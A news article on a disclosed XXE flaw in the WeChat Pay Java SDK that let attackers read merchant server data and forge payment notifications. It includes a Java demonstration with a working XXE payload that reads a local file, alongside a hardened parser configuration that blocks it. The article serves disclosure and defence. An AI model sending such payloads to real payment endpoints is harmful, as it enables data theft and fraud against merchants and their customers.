Buy anything for $0: the official WeChat Pay SDK has a serious vulnerability

With the spread of smartphones, mobile payment has become one of the main ways people pay for their daily shopping.

As third-party mobile payment has developed rapidly, it has diversified, accelerated industry innovation, created red-envelope marketing for businesses, and strengthened the social character of mobile payment.

As cashless payment spreads through society, payment institutions need to invest more in payment security.

Recently, a netizen published in a security community a serious vulnerability in the official WeChat Pay SDK (software development kit). The vulnerability can lead to compromise of the merchant server: once an attacker obtains the merchant's key secrets (the md5-key and merchant ID), he can deceive the merchant with forged payment notifications and obtain goods without paying anything.

When integrating WeChat Pay, merchants must provide a notification URL that receives the asynchronous payment result.

The problem is that the Java version of the SDK has an XXE (XML external entity) vulnerability in the code that parses the XML posted to that notification URL. An attacker can send a crafted payload to the notification URL and read whatever information he wants from the merchant server.
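To make the two preceding paragraphs concrete, the following is an added illustration written for this article; it is not code from the WeChat Pay SDK or from the disclosure. It models a merchant's notification handler that flattens the posted XML into a map, first with a default `DocumentBuilderFactory` (the XXE-prone pattern) and then with the parser hardened to refuse any DOCTYPE. The class name `NotifyXmlDemo`, the helper names, the constructed payload and the file path `/etc/hostname` are all illustrative assumptions.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;

/**
 * Added illustration (not the WeChat Pay SDK's code): parsing the XML that
 * WeChat Pay posts to a merchant's notification URL, once with a default
 * DocumentBuilderFactory (XXE-prone) and once hardened to reject a DOCTYPE.
 */
public class NotifyXmlDemo {

    /** XXE-prone: the JDK's default parser resolves external entities declared in a DTD. */
    static Map<String, String> xmlToMapVulnerable(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document doc = builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return childrenToMap(doc);
    }

    /** Hardened: no DOCTYPE is accepted, so no entity or external DTD can be declared at all. */
    static Map<String, String> xmlToMapHardened(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Payment notifications never need a DTD; refusing it blocks every XXE variant.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, in case a different parser implementation ignores the feature above.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document doc = builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return childrenToMap(doc);
    }

    /** Flatten <xml><a>1</a><b>2</b></xml> into {a=1, b=2}, as a notification handler would. */
    static Map<String, String> childrenToMap(Document doc) {
        Map<String, String> result = new HashMap<>();
        NodeList children = doc.getDocumentElement().getChildNodes();
        for (int i = 0; i < children.getLength(); i++) {
            Node node = children.item(i);
            if (node.getNodeType() == Node.ELEMENT_NODE) {
                result.put(node.getNodeName(), node.getTextContent());
            }
        }
        return result;
    }

    public static void main(String[] args) {
        // Constructed attacker payload posted to the notification URL. The entity pulls a
        // local file into the out_trade_no field; the file path is illustrative only.
        String payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                + "<!DOCTYPE xml [<!ENTITY xxe SYSTEM \"file:///etc/hostname\">]>\n"
                + "<xml>\n"
                + "  <return_code><![CDATA[SUCCESS]]></return_code>\n"
                + "  <out_trade_no>&xxe;</out_trade_no>\n"
                + "</xml>";

        try {
            Map<String, String> fields = xmlToMapVulnerable(payload);
            // The file's contents now sit in a field the merchant treats as an order number.
            System.out.println("vulnerable parser: out_trade_no = " + fields.get("out_trade_no"));
        } catch (Exception e) {
            System.out.println("vulnerable parser failed (file missing on this host?): " + e);
        }

        try {
            xmlToMapHardened(payload);
            System.out.println("hardened parser: accepted the payload (should not happen)");
        } catch (Exception e) {
            // Expected: the parser refuses the document because it contains a DOCTYPE.
            System.out.println("hardened parser rejected payload: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac NotifyXmlDemo.java && java NotifyXmlDemo`. On a host where the illustrative file exists, the vulnerable branch prints its contents in place of the order number, while the hardened branch throws a parse error before any entity is resolved. In a real notification handler the parsed fields are not echoed back to the sender, so an attacker has to pull the data out through a second, external entity (an out-of-band channel); reading a local file here simply keeps the demonstration offline. Merchants checking their own integration should confirm that every place the SDK parses XML applies settings equivalent to the hardened method above.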

In other words, a hacker who exploits this WeChat Pay vulnerability can buy goods for $0.

For ordinary WeChat Pay users, the most direct impact is that your personal information held in the merchant's back end may be exposed, and hackers can sell that information on the black market; you then become a target of spam and fraud.

For hackers, the loophole offers not only purchases for $0 but also profit from selling stolen user information.

Note that the details of the vulnerability and the attack have already been made public. Security personnel advise merchants who built their WeChat Pay integration with the Java SDK (software development kit) to check and patch quickly.

In response, Tencent said: “The WeChat Pay technology security team paid attention and investigated at the first opportunity, has updated the SDK on the official website to fix the known security vulnerabilities, and has reminded merchants to update in time. Please feel free to use WeChat Pay.”